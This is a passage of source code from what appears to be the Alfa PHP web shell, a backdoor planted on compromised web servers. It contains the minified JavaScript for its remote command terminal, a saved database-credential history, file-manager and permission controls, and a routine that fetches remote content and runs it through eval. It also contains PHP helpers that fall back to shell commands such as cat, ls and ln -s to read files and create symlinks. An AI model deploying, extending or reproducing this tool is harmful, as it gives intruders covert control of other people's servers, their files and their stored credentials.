0!==(r=l[terminal_walk_index[a].index])?(e.value=r,++terminal_walk_index[a].index):(e.value="",terminal_walk_index[a].index=0)):terminal_walk_index[a].index<l.length&&(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,e.value=l[terminal_walk_index[a].index],++terminal_walk_index[a].index),terminal_walk_index[a].key=1;break;case 40:l=alfaGetTerminalHistory(!0);if(terminal_walk_index[a].index>=0)0!=terminal_walk_index[a].index&&(--terminal_walk_index[a].index,1==terminal_walk_index[a].key&&--terminal_walk_index[a].index),void 0!==(r=l[terminal_walk_index[a].index])?e.value=r:(e.value="",terminal_walk_index[a].index=0);terminal_walk_index[a].key=0;break;default:console.log(i.keyCode)}else terminal_walk_index[a].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var a=t.getAttribute("term_id");return e=d.querySelector("#"+a+" .cmd-history-icon"),d.querySelector("#"+a+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+a+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var i=e.getAttribute("mode"),l=(a=e.getAttribute("term_id"),d.querySelector("#"+a+" .cmd-history-holder"));0==i.length||"off"==i?(l.style.visibility="visible",l.style.opacity="1",e.setAttribute("mode","on")):(l.style.visibility="hidden",l.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),a=e.getAttribute("fname"),i=e.getAttribute("base_id");if(".."==a&&"phar://"!=t.substr(0,7))return!1;var l="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(i)+"&ajax="+alfab64("true");_Ajax(d.URL,l,function(e){if("0"!=e){$("archive_base_"+i).innerHTML=e;var a=$("archive_dir_"+i).getAttribute("archive_name"),l=$("archive_dir_"+i).getAttribute("archive_full"),r="",o="";if(0!=(t=t.split(a)[1]).length){var n=(t=t.split("/")).length-1;for(var s in 0==t[n].length&&t.splice(n,1),t)0!=t.length&&(o+=t[s]+"/",r+='<a base_id="'+i+'" fname="'+t[s]+'" path="'+l+o+'" onclick="alfaOpenArchive(this);">'+t[s]+"/</a>")}d.querySelector("#archive_dir_"+i+" .archive_pwd_holder").innerHTML=r}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var i=d.querySelector("#"+t+" div.sf");i.querySelector("input[name=sql_host]").value=a[e].host,i.querySelector("input[name=sql_login]").value=a[e].user,i.querySelector("input[name=sql_pass]").value=a[e].pass,(i.querySelector("input[name=sql_base]")?i.querySelector("input[name=sql_base]"):i.querySelector("select[name=sql_base]")).value=a[e].db,i.querySelector("input[name=sql_count]").checked=!0,d.querySelector("#"+t+" div.sf .db-connect-btn").click()}function alfaShowConnectionHistory(e){var t={},a=e.getAttribute("db_id"),i=e.getAttribute("mode");if(rows='<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>',"on"==i){e.setAttribute("mode","off");try{t=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var l,r=1;for(l in t){var o=t[l].user+"_"+t[l].db;rows+='<tr class="dbh_'+o+'"><th>'+r+"</th><th>"+t[l].host+"</th><th>"+t[l].user+"</th><th>"+t[l].pass+"</th><th>"+t[l].db+'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\'alfaConnectToDb("'+o+'","'+a+'");\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\'alfaDeleteConnectToDb("'+o+"\");'>X</button></th></tr>",r++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+a+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(a[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete a[e],setCookie("alfa_connection_hist",btoa(JSON.stringify(a)),2012)}function alfaExecTerminal(e,t){var a="";if(0==(a=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==a?a="ls -trh --color":"ll"==a&&(a="ls -ltrh --color");var i=e.getAttribute("term_id");alfaloader(i,"block"),closeHistoryCmd("free",e);var l="";"FORM"==e.tagName&&(l=e.querySelector(".php-terminal-current-dir").innerHTML),0==(l=l.trim()).length&&(l=c_);var r="a="+alfab64("terminalExec")+"&c="+alfab64(l)+"&alfa1="+alfab64(a)+"&ajax="+alfab64("true");if(_Ajax(d.URL,r,function(e,t){alfaloader(t,"none");try{var a=$("tab_"+i);null!=a&&((-1==a.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(a.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",a.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,i),void 0===t){d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+a+"</div>");var o=alfaGetTerminalHistory(),n=o.indexOf(a);-1!=n&&o.splice(n,1),o.push(a),setCookie("alfa-terminal-history",btoa(JSON.stringify(o)),2012)}d.querySelector("#"+i+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t="filesman_holder_"+alfa_current_fm_id,a=getCookie(t+"_page_number"),i=e.innerText;if("<<"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;if(!((a=parseInt(a))>1))return!1;i=a-1}if(">>"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;a=parseInt(a);var l=d.querySelector("#"+t+" .last-page-number").innerHTML;if(!(a+1<=(l=parseInt(l))))return!1;i=a+1}setCookie(t+"_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),a=t.getElementsByClassName("box");for(i=0;i<a.length;i++)a[i].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var i;a=t.getElementsByClassName("sub-box");for(i=0;i<a.length;i++)a[i].setAttribute("opt_id",e),a[i].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var a=this.innerHTML,i=col_dumper_selected_data[t][e].indexOf(a);-1==i?col_dumper_selected_data[t][e].push(a):col_dumper_selected_data[t][e].splice(i,1)})}function showSymlinkPath(e,t){t.stopPropagation();var a=e.getAttribute("row"),i=$("td_row_"+a),l=e.getAttribute("opt_title"),r=e.getAttribute("fname");if(l=decodeURIComponent(r)+" -> "+l,null!=i){i.insertAdjacentHTML("afterbegin",'<div class="symlink_path" id="link_id_'+a+'">'+l+"</div>");var o=t.clientX,n=t.clientY-30;$("link_id_"+a).style.left=o+"px",$("link_id_"+a).style.top=n+"px"}}function hideSymlinkPath(e,t){t.stopPropagation(),$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML='<img draggable="false" title="'+t.server.name+'" src="http://solevisible.com/images/flags/48/'+t.server.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML='<img draggable="false" title="'+t.client.name+'" src="http://solevisible.com/images/flags/48/'+t.client.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var a=t.split("=");return e[a[0]]=a[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var a="auto";isArchive(t.file)&&(a="view"),editor(t.path+"/"+t.file,a,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,a="";if(".."==(a="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var i=t.getAttribute("id"),l=t.getAttribute("path"),r=t.getAttribute("ftype"),o=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var n in"file"!=r||isArchive(a)?o[3]="view_archive":o.splice(11,1),"folder"==r&&(o=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(o),o){var s=d.querySelector("#rightclick_menu > a[name="+o[n]+"]");switch(s.setAttribute("fid",i),s.setAttribute("fname",decodeURIComponent(a)),s.setAttribute("path",l),s.setAttribute("ftype",r),o[n]){case"view":case"edit":var c="auto";"edit"==o[n]&&(c="edit"),s.setAttribute("href","#action=fileman&path="+c_+"/&file="+a),s.setAttribute("onclick","editor('"+a+"','"+c+"','','','','file')");break;case"newtab":var u=a;"file"==r?(u="&file="+a,s.setAttribute("href","#action=fileman&path="+c_+"/"+u),s.setAttribute("target","_blank"),s.onclick=function(){}):(s.setAttribute("href","javascript:void(0)"),s.removeAttribute("target"),s.onclick=function(){alfaFilesManNewTab(c_,u)});break;case"delete":s.setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';");break;case"download":s.setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')");break;case"permission":try{var p=d.querySelector("#id_chmode_"+i.replace("id_","")+" span").innerHTML;s.setAttribute("perm",p.trim())}catch(e){}break;case"link":s.style.display="block";var f="<?php echo $_SERVER["DOCUMENT_ROOT"]; ?>/",m=(c_+"/"+a).replace(/\/\//g,"/");if(-1!=m.indexOf(f)){f=m.replace(f,"");var b=location.origin+"/"+f;s.setAttribute("href",""+b)}else s.style.display="none"}}var y=e.clientX,_=e.clientY;alfaRightClickMenu(y,_),e.preventDefault()})})}function alfaFilesManNewTab(e,t,a){var i=t;void 0!==a&&(i=alfaGetLastFolderName(e));var l=decodeURIComponent(e+"/"+t);l=l.replace(/\/\//g,"/");var r=$("filesman_tab_1"),o=r.getAttribute("fm_counter");o=parseInt(o)+1,r.setAttribute("fm_counter",o),d.querySelector("#filesman_tabs_child").insertAdjacentHTML("beforeend",'<div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" path="'+l+'" id="filesman_tab_'+o+'" fm_id="'+o+'" onclick="filesmanTabController(this);" fname="'+t+'" class="filesman_tab"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span class="filesman-tab-folder-name">'+i+'</span> <img fm_id="'+o+'" onclick="closeFmTab(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector(".ajaxarea").insertAdjacentHTML("beforebegin",'<div style="position:relative;" fm_id="'+o+'" id="filesman_holder_'+o+'" class="ajaxarea"><div class="header"></div></div>'),alfa_fm_id=o,g("FilesMan",l),alfa_fm_id=0}function alfaFilesmanTabShowTitle(e,t){t.stopPropagation();var a=$("filesman-tab-full-path");a.style.display="block",a.style.top=e.offsetTop-37+"px",a.style.left=e.offsetLeft-$("filesman_tabs").scrollLeft+"px",a.innerHTML=e.getAttribute("path")}function alfaFilesmanTabHideTitle(e,t){$("filesman-tab-full-path").style.display="none"}function alfaPopupAction(e,t){var a="",i="";switch(t){case"rename":a="Old file name:",i="New file name:";break;case"copy":a="File path:",i="Enter the file path that you want to copy this file to:";break;case"move":a="Current Path:",i="Enter the file path that you want to move this file to:";break;case"extract":a="Files to extract:",i="Enter the path you wish to extract the files to and click Extract:"}var l=e.getAttribute("fname"),r=e.getAttribute("path"),o=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",o="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var n=e.getAttribute("perm"),s=n.substr(1,1),c=n.substr(2,1),u=n.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(s,"u",["u","g","w"]),autoCheckPerms(c,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var p="move"==t||"copy"==t?r+l:l;if("modify"==t){var f="tr_row_"+e.getAttribute("fid").replace("id_","");p=d.querySelector("#"+f+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=o,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=o,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=r+l,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=p,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,a){if(void 0!==a)for(var i in a){var l=a[i];d.querySelector("#shortcutMenu-holder > form input[name="+l+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"x]").checked=!1}var r=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(r.checked=!0,o.checked=!0,n.checked=!0):"4"==e?r.checked=!0:"2"==e?o.checked=!0:"1"==e?n.checked=!0:"6"==e?(r.checked=!0,o.checked=!0):"3"==e?(o.checked=!0,n.checked=!0):"5"==e&&(r.checked=!0,n.checked=!0);else{var s=0;r.checked&&(s+=4),o.checked&&(s+=2),n.checked&&(s+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=s)}}function gg(e,t,a,i,l,r){var o="filesman_holder_"+alfa_current_fm_id;alfaloader(o,"block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(a)+"&alfa2="+alfab64(i)+"&alfa3="+alfab64(l)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,r,!1,o)}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var a=e.getAttribute("fid").replace("id_",""),i=$("id_"+a).getAttribute("fname"),l=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;l=l.trim(),i=i.trim(),gg("doActions",c_,i,l,t,function(e,i){if("rename"==t)if("done"==e){var r=$("id_"+a);updateFileEditor(a,l);var o=r.getAttribute("path")+$("id_"+a).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,r.addEventListener("animationend",function(){r.classList.remove("textEffect")}),r.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader(i,"none")});break;case"permission":var r=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,o=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;i=(i=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var s=r.trim()+o.trim()+n.trim();gg("doActions",c_,i,s,t,function(e,t){alfaloader(t,"none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":a=e.getAttribute("fid").replace("id_","");var c=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+a).getAttribute("fname");gg("doActions",c_,c,u,t,function(t,a){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=c,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader(a,"none")})}}function alfaInitSoratableTab(e){Sortable.create(e,{direction:"horizontal",animation:300,ghostClass:"sortable-ghost",filter:".not-sortable"})}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var a=0;t==editor_current_file&&(a=" is_active"),insertToHistory(t,editor_files[t].file,a,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length&&"[]"!=e){var t=JSON.parse(e);if(t.hasOwnProperty("content")){d.body.insertAdjacentHTML("beforeend",t.content);try{evalJS(t.content)}catch(t){}}if(t.hasOwnProperty("copyright")&&($("alfa-copyright").innerHTML=t.copyright),t.hasOwnProperty("solevisible")&&($("alfa_solevisible").innerHTML=t.solevisible),t.hasOwnProperty("code_name")&&($("hidden_sh").innerHTML=t.code_name.replace(/\{version\}/g,t.version_number)),t.hasOwnProperty("market")){var a=d.querySelector("span.alfa_plus");if(t.market.hasOwnProperty("visible")&&"yes"==t.market.visible&&($("menu_opt_market").style.display="inline"),"open"!=t.market.status&&(a.style.color="#ffc107"),t.market.hasOwnProperty("content"))try{evalJS(t.market.content)}catch(t){}}}}),<?php echo $GLOBALS["need_to_update_header"]; ?>?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var a in t){for(var i="",l=0;l<t[a].length;l++)i+="useful"==a||"downloader"==a?'<span class="header_values" style="margin-left: 4px;">'+t[a][l]+"</span>":t[a][l];var r=$("header_"+a);r&&(r.innerHTML=i)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),function(){d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501)},!1);var e=document.createElement("script");e.src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js",e.id="sortable-plugin",e.onload=function(){alfaInitSoratableTab($("filesman_tabs_child")),alfaInitSoratableTab(d.querySelector(".editor-tabs")),alfaInitSoratableTab(d.querySelector(".options_tab")),alfaInitSoratableTab(d.querySelector(".terminal-tabs")),alfaInitSoratableTab(d.querySelector(".sql-tabs"))},d.body.appendChild(e)}();
  2361. </script>
  2362. </body>
  2363. </html>
  2364. <?php
  2365. }}
  2366. if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
  2367. function posix_getpwuid($p) {return false;} }
  2368. if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
  2369. function posix_getgrgid($p) {return false;} }
  2370. function alfaWhich($p) {
  2371. $path = alfaEx('which ' . $p,false,false);
  2372. if(!empty($path))
  2373. return strlen($path);
  2374. return false;
  2375. }
  2376. function alfaSize($s) {
  2377. if($s >= 1073741824)
  2378. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  2379. elseif($s >= 1048576)
  2380. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  2381. elseif($s >= 1024)
  2382. return sprintf('%1.2f', $s / 1024 ) . ' KB';
  2383. else
  2384. return $s . ' B';
  2385. }
  2386. function alfaPerms($p) {
  2387. if (($p & 0xC000) == 0xC000)$i = 's​';
  2388. elseif (($p & 0xA000) == 0xA000)$i = 'l​';
  2389. elseif (($p & 0x8000) == 0x8000)$i = '-​';
  2390. elseif (($p & 0x6000) == 0x6000)$i = 'b​';
  2391. elseif (($p & 0x4000) == 0x4000)$i = 'd​';
  2392. elseif (($p & 0x2000) == 0x2000)$i = 'c​';
  2393. elseif (($p & 0x1000) == 0x1000)$i = 'p​';
  2394. else $i = 'u​';
  2395. $i .= (($p & 0x0100) ? 'r​' : '-');
  2396. $i .= (($p & 0x0080) ? 'w​' : '-');
  2397. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's​' : 'x​' ) : (($p & 0x0800) ? 'S​' : '-'));
  2398. $i .= (($p & 0x0020) ? 'r​' : '-');
  2399. $i .= (($p & 0x0010) ? 'w​' : '-');
  2400. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's​' : 'x​' ) : (($p & 0x0400) ? 'S​' : '-'));
  2401. $i .= (($p & 0x0004) ? 'r​' : '-');
  2402. $i .= (($p & 0x0002) ? 'w​' : '-');
  2403. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't​' : 'x​' ) : (($p & 0x0200) ? 'T​' : '-'));
  2404. return $i;
  2405. }
  2406. function alfaPermsColor($f,$isbash=false){
  2407. $class = "";
  2408. $num = "";
  2409. $human = "";
  2410. if($isbash){
  2411. $class = $f["class"];
  2412. $num = $f["num"];
  2413. $human = $f["human"];
  2414. }else{
  2415. $num = substr(sprintf('%o', @fileperms($f)),-4);
  2416. $human = alfaPerms(@fileperms($f));
  2417. if(!@is_readable($f))
  2418. $class = "main_red_perm";
  2419. elseif (!@is_writable($f))
  2420. $class = "main_white_perm";
  2421. else
  2422. $class = "main_green_perm";
  2423. }
  2424. return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
  2425. }
  2426. if(!function_exists("scandir")) {
  2427. function scandir($dir) {
  2428. $dh = opendir($dir);
  2429. while (false !== ($filename = readdir($dh)))
  2430. $files[] = $filename;
  2431. return $files;
  2432. }
  2433. }
  2434. function reArrayFiles($file_post){
  2435. $file_ary = array();
  2436. $file_count = count($file_post['name']);
  2437. $file_keys = array_keys($file_post);
  2438. for ($i=0; $i<$file_count; $i++) {
  2439. foreach ($file_keys as $key) {
  2440. $file_ary[$i][$key] = $file_post[$key][$i];
  2441. }
  2442. }
  2443. return $file_ary;
  2444. }
  2445. function _alfa_can_runCommand($cgi=true,$cache=true){
  2446. if(isset($_COOKIE["alfa_canruncmd"])&&$cache){
  2447. return true;
  2448. }
  2449. if(strlen(alfaEx("whoami",false,$cgi))>0){
  2450. $_COOKIE["alfa_canruncmd"] = true;
  2451. return true;
  2452. }
  2453. return false;
  2454. }
  2455. function _alfa_symlink($target, $link){
  2456. $phpsym = function_exists("symlink");
  2457. if($phpsym){
  2458. @symlink($target, $link);
  2459. }else{
  2460. alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
  2461. }
  2462. }
  2463. function _alfa_file_exists($file,$cgi=true){
  2464. if(@file_exists($file)){
  2465. return true;
  2466. }else{
  2467. if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
  2468. return true;
  2469. }
  2470. }
  2471. return false;
  2472. }
  2473. function _alfa_file($file,$cgi=true){
  2474. $array = @file($file);
  2475. if(!$array){
  2476. if(strlen(alfaEx("id",false,$cgi))>0){
  2477. $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
  2478. if(strlen($data)>0){
  2479. return explode("\n", $data);
  2480. }else{
  2481. return false;
  2482. }
  2483. }else{
  2484. return false;
  2485. }
  2486. }else{
  2487. return$array;}
  2488. }
  2489. function _alfa_is_writable($file){
  2490. $check = false;
  2491. $check = @is_writable($file);
  2492. if(!$check){
  2493. if(_alfa_can_runCommand()){
  2494. $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
  2495. if($check == "yes"){
  2496. $check = true;
  2497. }else{
  2498. $check = false;
  2499. }
  2500. }
  2501. }
  2502. return $check;
  2503. }
  2504. function _alfa_is_dir($dir,$mode="-d"){
  2505. $check = false;
  2506. $check = @is_dir($dir);
  2507. if($mode == "-e"){
  2508. $check = @is_file($dir);
  2509. }
  2510. if(!$check){
  2511. if(_alfa_can_runCommand()){
  2512. $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
  2513. if($check == "yes"){
  2514. return true;
  2515. }else{
  2516. return false;
  2517. }
  2518. }
  2519. }
  2520. return $check;
  2521. }
  2522. function _alfa_load_ace_options($base){
  2523. return '<span>Theme: </span><select class="ace-controler ace-theme-selector" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'theme\');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'lang\');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,\''.$base.'\');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize(\''.$base.'\',\'+\', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize(\''.$base.'\', \'-\', this);return false;">-</button> | ';
  2524. }
  2525. function alfaFilesMan2(){
  2526. alfahead();
  2527. AlfaNum(8,9,10,7,6,5,4);
  2528. echo '<div style="position:relative;" fm_id="1" id="filesman_holder_1" class="ajaxarea filesman-active-content"><div class="header"></div></div>';
  2529. alfaFooter();
  2530. }
  2531. function copy_paste($c,$s,$d){
  2532. if(@is_dir($c.$s)){
  2533. @mkdir($d.$s);
  2534. $h = @opendir($c.$s);
